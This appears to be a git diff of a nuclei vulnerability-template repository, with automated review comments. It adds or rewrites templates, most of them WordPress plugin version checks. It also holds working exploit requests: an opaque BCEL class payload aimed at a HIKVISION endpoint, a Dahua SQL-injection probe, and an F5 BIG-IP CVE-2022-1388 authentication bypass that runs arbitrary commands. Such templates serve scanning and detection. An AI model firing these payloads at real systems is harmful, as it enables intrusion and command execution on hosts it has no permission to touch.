$$80$e7$b1$8b$9c$ed$e1q$9b_$wpY$m$e1$3c$d8$dc$s$9dJ$A$d7$cd$ee$96$J$cc$cba$7e$e0$9a$J$y8$83$85$f4$d7$e5$5e3$bf$e1$d4$R$d7$f5$N$f3$97$f7$84$cf$ba$96$90$fb$8b$9a$3dAO$60q$O$d7$kvU$d1$ee$V$b4$hs$95$84$D$b5$q$d6$ec$Nz$l$c5$921$ee$a5$a07$b0$94$I$81el$J$d9WY$I$cd$be$y$f7$y$5d$d5$db$s$g$9a$7d$ee$V$7c$V$l$f4$jG$p$87$p$dc$a9$a0$af$8a$3f$8e$b0$L$cdBP$ID$f2$gY$fd$a3n$aa$3f$d5$3e$e8$a5$8dH$85o$f6$3b$X$d7$e5q$d3$U$b3o$3dyX7$c5$D$cb$c7q$3d$83$c8$Z41$9f$cfb$uH$89$be$e10$94$a0$9fI$be$d2$91tZ$a3$3c$e8$f7$5c$ee$88$K$9cc$7d$c0$e0$e5$b0$ae$f0N$g$89$7b$f2$96$fc$de$Z$96$e2d$c3$W$f1$b4$5c$cd$b3$hgz6$96$f7$ec$de$ff$c1$b3$c0$ca$J$ac$ca$a19$d0$c2$w$80$m$f5$7c$TY$5b$cd$5c$5cC$zO$dedQ$9d$a7$aee$d4u$O$b5Y$M$faO$60$7d$fc$E6$c4$83$e28Zsh$cba$e38$da$D$j9l$caas$O$9d$T$b8$89$e2$m$d7Jl$d7$c6P5w$M$VA$ff$E$b6$e4$d0$e50$Q$c5$97$85$ff$m$cfe$_$ae$9e$3c$b8$b8$ec$85$t$b2$f0la$8d$d9$D$99pYG$f0$earm$a5$a7$83$e9$p$I$d1$w$d0$c9O$cdZ$82$f9$84$f1E$84$ecZ$ccB$3d5$edZ$94S$dbV$90t$r$c9W$93$86$d9$84$ec$wh$84$f8$M$e6$e2$m$e6$e1$k$92$ba$9f$d0$7f$M$L$f0$M$W$e2$3c$Wq$d5X$ccu$e2Zn$L$96p$fb$b0$94$bb$h$cb$b8$a3$Iq$e7Q$e7$aa$40$bd$ab$92$90U$8b$88k9$9a$5c$x$b0$dc$b5$Ks$5d$eb$b0$c2$d5$86$h$5d$j$uqua$jy$b9$c6$b5$8d$feU$ed$b5$bb$ae$fc$o$aa9$k$L$b9K4$t$7c$f6$8e$c7$ed$3c$ee$a0$v$A$da$ca$d4d$b3x$f4s$X$f0$a4$3d$Yv$bc$84C$dby$uuR$c5$L$f0$bd$I$ef$r$g$3fn$5b$Q$f87$bc$ad$q$c3$e6y$82$d4$bb$a0$fe$H$d8$3e$ebc$Z$Q$A$A"}}} matchers: - type: word words: - - '{{randstr}}' + - "nt authority\\system" diff --git a/poc/other/Dahua_getUserInfoByUserName.yaml b/poc/other/Dahua_getUserInfoByUserName.yaml index 77936cf562..78d89c1465 100644 --- a/poc/other/Dahua_getUserInfoByUserName.yaml +++ b/poc/other/Dahua_getUserInfoByUserName.yaml 
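Review bot: The rewritten request embeds an opaque `$$BCEL$$` class blob in `driverClassName` with no source, build recipe or comment anywhere in the template, so nobody reviewing this repository can tell what code it loads onto the scanned host; a shared detection template should carry auditable payloads or at least a comment stating what the blob does. The single matcher `- "nt authority\\system"` only fires on Windows targets running as SYSTEM, so Linux or reduced-privilege deployments will be reported clean; the description should state that limitation. `id: HIKVISION` / `name: HIKVISION` no longer identify the issue, the file still sits under `poc/microsoft/`, and the description names neither the affected versions nor the endpoint `/bic/ssoService/v1/applyCT` that the check targets.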
@@ -1,31 +1,29 @@ id: Dahua info: - name: Dahua Smart Park Comprehensive Management Platform User_ GetUserInfoByUserName.action Account Password Disclosure Vulnerability + name: Dahua Smart Park Comprehensive Management Platform getFaceCapture SQL Injection Vulnerability author: Zero Trust Security Attack and Defense Laboratory - severity: medium + severity: high description: | - Dahua Smart Park Comprehensive Management Platform User_ API interface exists in getUserInfoByUserName.action, which leads to password leakage of the management park account + There is an SQL injection vulnerability in the getFaceCapture interface of Dahua Smart Park Comprehensive Management Platform, which allows attackers to execute arbitrary SQL statements and obtain sensitive database information through the vulnerability metadata: fofa-query: app="dahua-智慧园区综合管理平台" hunter-query: web.body="/WPMS/asset/lib/json2.js" + + http: - method: GET path: - - "{{BaseURL}}/admin/user_getUserInfoByUserName.action?userName=system" + - "{{BaseURL}}/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(1)),0x7e),1)--%22%7D/extend/%7B%7D" matchers-condition: and matchers: - type: word part: body words: - - "loginName" - - "loginPass" + - "c4ca" - type: status status: - - 200 - -# 获取后访问地址 -# /admin/login_login.action + - 500 diff --git a/poc/other/bigip.yaml b/poc/other/bigip.yaml index 824800fadb..62a06938bc 100644 --- a/poc/other/bigip.yaml +++ b/poc/other/bigip.yaml 
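Review bot: The file keeps its name `Dahua_getUserInfoByUserName.yaml` and `id: Dahua` while its content now describes a different issue (getFaceCapture SQL injection), so anyone looking for the old account-disclosure check, or correlating results by id, gets the wrong template; rename the file and use a specific id such as `id: dahua-getfacecapture-sqli`. The template also has no `tags:` field at all. Matching `- 500` together with the four-character word `c4ca` is a weak signal — any error page containing that substring qualifies — so the description should say the match relies on the database error being reflected in the response, and the full `md5(1)` digest the probe requests would be a less ambiguous word.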
@@ -1,30 +1,29 @@ id: CVE-2022-1388 - info: - name: F5 BIG-IP iControl - REST Auth Bypass RCE - author: dwisiswant0,Ph33r + name: F5 BIG-IP iControl REST Auth Bypass RCE | Command Parameter + author: Mrcl0wn severity: critical - description: | - F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, may allow undisclosed requests to bypass iControl REST authentication. + description: "CVE-2022-1388 is an authentication bypass vulnerability in the REST \ncomponent of BIG-IP’s iControl API that was assigned a CVSSv3 \nscore of 9.8. The iControl REST API is used for the management and \nconfiguration of BIG-IP devices. CVE-2022-1388 could be exploited \nby an unauthenticated attacker with network access to the management \nport or self IP addresses of devices that use BIG-IP. Exploitation would \nallow the attacker to execute arbitrary system commands, create and \ndelete files and disable services.\n" reference: - - https://twitter.com/GossiTheDog/status/1523566937414193153 - - https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/ + - https://github.com/alt3kx/CVE-2022-1388_PoC - https://support.f5.com/csp/article/K23605346 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388 + - https://github.com/dorkerdevil/CVE-2021-22986-Poc/blob/main/README.md + - https://github.com/horizon3ai/CVE-2022-1388/blob/main/CVE-2022-1388.py + - https://www.tenable.com/blog/cve-2022-1388-authentication-bypass-in-f5-big-ip + - https://github.com/numanturle/CVE-2022-1388/blob/main/bigip-icontrol-rest-rce.yaml classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-score: 9.80 cve-id: CVE-2022-1388 cwe-id: CWE-306 metadata: shodan-query: http.title:"BIG-IP®-+Redirect" +"Server" - verified: "true" - tags: f5,bigip,cve,cve2022,rce,mirai,kev - + verified: true + tags: 
bigip,mirai,rce,cve,cve2022 variables: - auth: "admin:" - cmd: "echo CVE-2022-1388 | rev" - + auth_var: "admin:" + cmd_var: "{{CMD}}" requests: - raw: - | @@ -32,35 +31,27 @@ requests: Host: {{Hostname}} Connection: keep-alive, X-F5-Auth-Token X-F5-Auth-Token: a - Authorization: Basic {{base64(auth)}} - Content-Type: application/json - - { - "command": "run", - "utilCmdArgs": "-c '{{cmd}}'" - } - - - | - POST /mgmt/tm/util/bash HTTP/1.1 - Host: localhost - Connection: keep-alive, X-F5-Auth-Token - X-F5-Auth-Token: a - Authorization: Basic {{base64(auth)}} + Authorization: Basic {{base64(auth_var)}} Content-Type: application/json { - "command": "run", - "utilCmdArgs": "-c '{{cmd}}'" + "command": "run", + "utilCmdArgs": "-c 'id;cmd_var'" } - - stop-at-first-match: true - matchers-condition: and + extractors: + - type: regex + part: body + name: result_command + group: 1 + regex: + - "\"commandResult\":\"(.*)\"" matchers: - type: word - part: body words: - "commandResult" - - "8831-2202-EVC" + - "uid=" + - "{{cmd_var}}" + - type: status + status: + - 200 condition: and - -# Enhanced by mp on 2022/05/19 diff --git a/poc/other/bitformpro.yaml b/poc/other/bitformpro.yaml new file mode 100644 index 0000000000..2a3d1d31fb --- /dev/null +++ b/poc/other/bitformpro.yaml 
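Review bot: `cmd_var: "{{CMD}}"` makes the template depend on a CLI-supplied `CMD` variable that nothing in the file documents; when it is not passed the placeholder stays literal, which also makes the `verified: true` this hunk sets hard to justify. Add a comment above `variables:` such as `# requires -var CMD=<command>; see the second hunk for where it is used`, or keep a fixed, non-destructive default like the removed `cmd` had. `cvss-score: 9.80` reverts to the two-decimal form that the CVE-2018-15535 hunk in this same commit is correcting.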
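Review bot: `"utilCmdArgs": "-c 'id;cmd_var'"` passes the literal text `cmd_var` rather than `{{cmd_var}}`, so the variable declared in the previous hunk is never interpolated and the matcher word `- "{{cmd_var}}"` looks for a string that cannot appear in the body; it should read `"utilCmdArgs": "-c 'id;{{cmd_var}}'"`. With `matchers-condition: and` removed, nuclei falls back to its default `or`, so the newly added `type: status` matcher alone turns any target that answers 200 on `/mgmt/tm/util/bash` into a finding; restore `matchers-condition: and` above `matchers:`. The surviving context line `condition: and` now sits after the status matcher rather than under the word matcher it belonged to — worth checking that the indentation still attaches it to the right matcher.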
@@ -0,0 +1,59 @@
+id: bitformpro
+
+info:
+ name: >
+ Bit Form Pro <= 2.6.4 - Authenticated (Subscriber+) Sensitive Information Exposure
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/efa646ee-ebee-4528-a421-09ee3dc8275a?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/bitformpro/"
+ google-query: inurl:"/wp-content/plugins/bitformpro/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,bitformpro,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/bitformpro/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "bitformpro"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.6.4')
\ No newline at end of file
diff --git a/poc/other/compute-links.yaml b/poc/other/compute-links.yaml
new file mode 100644
index 0000000000..5a87490cbc
--- /dev/null
+++ b/poc/other/compute-links.yaml
@@ -0,0 +1,59 @@
+id: compute-links
+
+info:
+ name: >
+ Compute Links <= 1.2.1 - Unauthenticated Remote File Inclusion
+ author: topscoder
+ severity: critical
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/1d2b78e0-1b82-4074-8051-e44dcfe3ac51?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/compute-links/"
+ google-query: inurl:"/wp-content/plugins/compute-links/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,compute-links,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/compute-links/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "compute-links"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.1')
\ No newline at end of file
diff --git a/poc/other/custom-permalinks-44331c84afd644601efc55a9e5863103.yaml b/poc/other/custom-permalinks-44331c84afd644601efc55a9e5863103.yaml
new file mode 100644
index 0000000000..f6f933bf45
--- /dev/null
+++ b/poc/other/custom-permalinks-44331c84afd644601efc55a9e5863103.yaml
@@ -0,0 +1,59 @@
+id: custom-permalinks-44331c84afd644601efc55a9e5863103
+
+info:
+ name: >
+ Custom Permalinks <= 2.6.0 - Authenticated(Editor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/97f8549a-292d-4a6d-8ec0-550467e5cf0f?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/custom-permalinks/"
+ google-query: inurl:"/wp-content/plugins/custom-permalinks/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,custom-permalinks,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/custom-permalinks/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "custom-permalinks"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.6.0')
\ No newline at end of file
diff --git a/poc/other/devvn-image-hotspot-269eebf1ba30b97f68098501ab57b8df.yaml b/poc/other/devvn-image-hotspot-269eebf1ba30b97f68098501ab57b8df.yaml
new file mode 100644
index 0000000000..346eba4216
--- /dev/null
+++ b/poc/other/devvn-image-hotspot-269eebf1ba30b97f68098501ab57b8df.yaml
@@ -0,0 +1,59 @@
+id: devvn-image-hotspot-269eebf1ba30b97f68098501ab57b8df
+
+info:
+ name: >
+ Image Hotspot by DevVN <= 1.2.5 - Authenticated (Author+) PHP Object Injection
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/624bdb9e-6c50-4a00-9a04-1a32c938d48b?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/devvn-image-hotspot/"
+ google-query: inurl:"/wp-content/plugins/devvn-image-hotspot/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,devvn-image-hotspot,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/devvn-image-hotspot/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "devvn-image-hotspot"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.5')
\ No newline at end of file
diff --git a/poc/other/display-a-meta-field-as-block.yaml b/poc/other/display-a-meta-field-as-block.yaml
new file mode 100644
index 0000000000..825e66a72b
--- /dev/null
+++ b/poc/other/display-a-meta-field-as-block.yaml
@@ -0,0 +1,59 @@
+id: display-a-meta-field-as-block
+
+info:
+ name: >
+ Meta Field Block <= 1.2.13 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/faee30bb-ba6e-4d3e-8ca1-79fd676e68f5?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/display-a-meta-field-as-block/"
+ google-query: inurl:"/wp-content/plugins/display-a-meta-field-as-block/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,display-a-meta-field-as-block,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/display-a-meta-field-as-block/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "display-a-meta-field-as-block"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.13')
\ No newline at end of file
diff --git a/poc/other/givingpress-lite.yaml b/poc/other/givingpress-lite.yaml
new file mode 100644
index 0000000000..ba01719837
--- /dev/null
+++ b/poc/other/givingpress-lite.yaml
@@ -0,0 +1,59 @@
+id: givingpress-lite
+
+info:
+ name: >
+ GivingPress Lite <= 1.8.6 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/69a14e2f-442e-421c-bf5d-0bff3b822911?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/themes/givingpress-lite/"
+ google-query: inurl:"/wp-content/themes/givingpress-lite/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-theme,givingpress-lite,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/givingpress-lite/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "givingpress-lite"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.8.6')
\ No newline at end of file
diff --git a/poc/other/gutentor.yaml b/poc/other/gutentor.yaml
new file mode 100644
index 0000000000..dd9a88caad
--- /dev/null
+++ b/poc/other/gutentor.yaml
@@ -0,0 +1,59 @@
+id: gutentor
+
+info:
+ name: >
+ Gutentor - Gutenberg Blocks - Page Builder for Gutenberg Editor <= 3.3.5 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c3b1ff70-7e37-4f74-bd72-ecda81d13d83?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/gutentor/"
+ google-query: inurl:"/wp-content/plugins/gutentor/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,gutentor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/gutentor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "gutentor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.3.5')
\ No newline at end of file
diff --git a/poc/other/hr-management.yaml b/poc/other/hr-management.yaml
new file mode 100644
index 0000000000..344c9f7ef6
--- /dev/null
+++ b/poc/other/hr-management.yaml
@@ -0,0 +1,59 @@
+id: hr-management
+
+info:
+ name: >
+ Crew HRM <= 1.1.1 - Unauthenticated PHP Object Injection
+ author: topscoder
+ severity: critical
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/dc3e3d47-cae3-46a6-9b60-ad1eb6b7ced7?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/hr-management/"
+ google-query: inurl:"/wp-content/plugins/hr-management/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,hr-management,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/hr-management/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "hr-management"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1.1')
\ No newline at end of file
diff --git a/poc/other/imagerecycle-pdf-image-compression-76fdeef266854108ceda8d0e46474378.yaml b/poc/other/imagerecycle-pdf-image-compression-76fdeef266854108ceda8d0e46474378.yaml
new file mode 100644
index 0000000000..8efe3ba27e
--- /dev/null
+++ b/poc/other/imagerecycle-pdf-image-compression-76fdeef266854108ceda8d0e46474378.yaml
@@ -0,0 +1,59 @@
+id: imagerecycle-pdf-image-compression-76fdeef266854108ceda8d0e46474378
+
+info:
+ name: >
+ ImageRecycle pdf & image compression <= 3.1.14 - Cross-Site Request in Several AJAX Actions
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/a06bba7f-0259-4b87-b3fe-6ad8318fda7d?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/imagerecycle-pdf-image-compression/"
+ google-query: inurl:"/wp-content/plugins/imagerecycle-pdf-image-compression/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,imagerecycle-pdf-image-compression,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/imagerecycle-pdf-image-compression/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "imagerecycle-pdf-image-compression"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.1.14')
\ No newline at end of file
diff --git a/poc/other/imagerecycle-pdf-image-compression-7b8181a7be59fef3323111e90fb3e895.yaml b/poc/other/imagerecycle-pdf-image-compression-7b8181a7be59fef3323111e90fb3e895.yaml
new file mode 100644
index 0000000000..62d6736209
--- /dev/null
+++ b/poc/other/imagerecycle-pdf-image-compression-7b8181a7be59fef3323111e90fb3e895.yaml
@@ -0,0 +1,59 @@ +id: imagerecycle-pdf-image-compression-7b8181a7be59fef3323111e90fb3e895 + +info: + name: > + ImageRecycle pdf & image compression <= 3.1.14 - Missing Authorization in Several AJAX Actions + author: topscoder + severity: high + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f330bf36-0a39-40d6-a075-c87fdb9dc2da?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/imagerecycle-pdf-image-compression/" + google-query: inurl:"/wp-content/plugins/imagerecycle-pdf-image-compression/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,imagerecycle-pdf-image-compression,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/imagerecycle-pdf-image-compression/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "imagerecycle-pdf-image-compression" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.1.14') \ No newline at end of file diff --git a/poc/other/kbucket-213e255d0f7bbab0012e0bbbd474a0f3.yaml b/poc/other/kbucket-213e255d0f7bbab0012e0bbbd474a0f3.yaml new file mode 100644 index 0000000000..1e9fdfdc28 --- /dev/null +++ b/poc/other/kbucket-213e255d0f7bbab0012e0bbbd474a0f3.yaml 
@@ -0,0 +1,59 @@ +id: kbucket-213e255d0f7bbab0012e0bbbd474a0f3 + +info: + name: > + KBucket: Your Curated Content in WordPress <= 4.1.4 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b37087a4-83b2-4355-89f0-6ff0aa8d0013?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/kbucket/" + google-query: inurl:"/wp-content/plugins/kbucket/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,kbucket,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/kbucket/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "kbucket" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.1.4') \ No newline at end of file diff --git a/poc/other/maxbuttons-64ecf3c81675d9335f44728b57cd5ada.yaml b/poc/other/maxbuttons-64ecf3c81675d9335f44728b57cd5ada.yaml new file mode 100644 index 0000000000..010147536e --- /dev/null +++ b/poc/other/maxbuttons-64ecf3c81675d9335f44728b57cd5ada.yaml 
@@ -0,0 +1,59 @@ +id: maxbuttons-64ecf3c81675d9335f44728b57cd5ada + +info: + name: > + WordPress Button Plugin MaxButtons <= 9.7.8 - Full Path Disclosure + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/fdd0694c-ea7e-4cf8-a8d8-82a2b02fecdf?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/maxbuttons/" + google-query: inurl:"/wp-content/plugins/maxbuttons/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,maxbuttons,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/maxbuttons/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "maxbuttons" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 9.7.8') \ No newline at end of file diff --git a/poc/other/purity-of-soul.yaml b/poc/other/purity-of-soul.yaml new file mode 100644 index 0000000000..0c3d0b4de2 --- /dev/null +++ b/poc/other/purity-of-soul.yaml 
@@ -0,0 +1,59 @@ +id: purity-of-soul + +info: + name: > + Purity Of Soul <= 1.9 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/53d2f416-4b0f-49b7-af14-fbb225aac34d?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/themes/purity-of-soul/" + google-query: inurl:"/wp-content/themes/purity-of-soul/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-theme,purity-of-soul,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/purity-of-soul/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "purity-of-soul" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.9') \ No newline at end of file diff --git a/poc/other/responsive-block-editor-addons.yaml 